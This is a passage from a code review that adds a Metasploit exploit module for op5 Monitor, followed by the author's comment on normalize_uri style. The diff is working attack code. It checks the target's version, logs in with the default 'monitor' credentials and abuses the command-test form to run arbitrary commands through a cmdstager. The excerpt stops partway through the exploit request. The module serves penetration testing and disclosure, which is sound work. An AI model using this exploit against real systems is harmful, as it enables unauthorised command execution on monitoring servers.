modules/exploits/linux/http/op5_config_exec.rb

```diff
@@ -0,0 +1,127 @@
+          can be abused to run arbitrary code as an unpriv user.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>', # module
+            'hyp3rlinx'                        # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39676' ],
+            [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 08 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path),
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      /Version: (?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+\|/ =~ res.body
+
+      if version_high && version_med && version_low && \
+         version_high.to_i <= 7 && \
+         version_med.to_i <= 1 && \
+         version_low.to_i <= 9
+        vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    execute_cmdstager(
+      :flavor  => :echo,
+      :nodelete => true
+    )
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      # To manually view the vuln page, click Manage > Configure > Commands.
+      # Click the "Test this command" button to display the form we abuse.
+
+      # login
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/index.php/auth/login?uri=tac%2Findex'),
+        'method'    => 'POST',
+        'vars_get'  =>
+        {
+          'csrf_token' => '',
+          'username'   => datastore['USERNAME'],
+          'password'   => datastore['PASSWORD']
+        }
+      )
+
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
+      cookie = res.get_cookies
+      # exploit
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
```

Comment:
I did a search through the repo for normalize_uri when @wvu-r7 suggested using it.  Eyeballing it, it seems like 1/3 of modules do it the way I did, and 2/3 do it the way you mention.  I figured that normalize_uri's functionality (right or wrong) in this case is to ensure uri.path ends with /, and that there wasn't a reason why I need the function to add the slash in-between all the other parts of the path.  To me, it seems like the 'broken up' method is, slightly more complex code wise, harder to search for a path when looking for a module in code, and slightly less visually appealing.

With all that being said, if the 'broken up' method is the way thats officially deemed correct, I'll change it (along with my ipfire modules, and centreon module).  Is there official guidance anywhere?